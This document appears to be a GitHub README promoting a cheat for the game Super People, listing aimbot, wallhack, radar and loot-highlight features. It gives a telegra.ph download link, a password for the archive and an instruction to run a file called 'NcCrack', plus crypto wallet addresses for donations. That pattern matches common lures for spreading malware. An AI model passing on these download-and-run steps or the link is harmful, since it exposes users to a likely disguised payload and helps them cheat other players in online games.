# Cheat-Super-People-Aim-Loot-Misc

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server

-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Support the author ( On chips )

- BTC - bc1q7kmj3pyhcm2n02z6p7gxvusqv55pt7vcgxe6ut

- ETH - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

- TRC-20 ( Usdt ) - TRYhDuV6qVcHQjfqEgF15w72TdxCMLDt9b

- BNB - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# Functional

- Only visible
- Friends (Friends)
- Name (Name)
- Team (Team)
- Line (Lines)
- Kills (number of kills)
- Health (Health)
- Box 2D (Boxes)
- Skeleton (Skeletons (taking into account visibility)
- Distance (Distance)
- Skeleton (Skeleton)
- Size line skeleton: (Skeleton size(1-3))
- Skeleton draw distance: (Skeleton drawing range)
- Backlight distance: (Illumination range (from 10m to 1000m))

# Radar

- Enable radar
- Backlight distance:
- Position by X:
- Position by Y:
- Size by W:
- Size by H:
- Alpha:

# Loot

- Vehicles (Transport)
- Weapons: (Weapons)
- Assault
- DMR
- SMG
- Sniper rifle
- Shotgun
- Pistol
- Throwing weapon
- Ammo (Ammunition)
- Attachments (Modules)
- Equipments: (Equipment)
- Headgear (Helmet)
- Vest (Vest)
- Backpack (Backpack)
- Medicine: (Medicines)
- Medipack
- Energy Bar
- Painkiller
- Tablets
- Chest (Drawers)
- Craft (Craft)
- Blueprints (Drawings)
- For vehicle (For vehicle)
- Backlight loot distance: (Loot illumination range)

# AIM

- Enable aimbot (Aim (triggered when the specified key is held down)
- Do not aim at friends (Don't aim at friends)
- Visibility check (Wall accounting)
- Aim priority: (Aim priority)
- Distance (Distance)
- Crosshair (Sight)
- Control radius: (Control radius (free zone of movement of the sight, taking into account the captured target))
- Draw fov circle (Disabling the visual FoV circle)
- Fov: (Viewing Angle(FOV)(aim trigger zone))
- Distance: (AIM trigger distance)
- Enable prediction (Enabling and disabling shot prediction)
- Draw aim prediction (Big frame delay) (Prediction of the draw goal (big frame delay)
- Bones selection: ( bone selection . you can choose 1 bone or multiple bones)
- Head (head)
- Neck (neck)
- Left elbow (Left hand)
- Right elbow (Right hand)
- Body (body)
- Pelvis (groin)
- Left knee (left knee)
- Right knee (right knee)
- Key selection (Key selection for aim operation) (ANY OF YOUR CHOICE)

# Colors

- Visible players color
- Invisible players color
- My team players color
- Target player color
- AI players color
- Airdrops color
- Corpses color
- Vehicles color
- Weapons color
- Ammunition color
- Attachments color
- Equipments color
- Use color

# Setting

- Key to disable loot:(The key to disable loot)
- Open menu key: (Open Menu key)
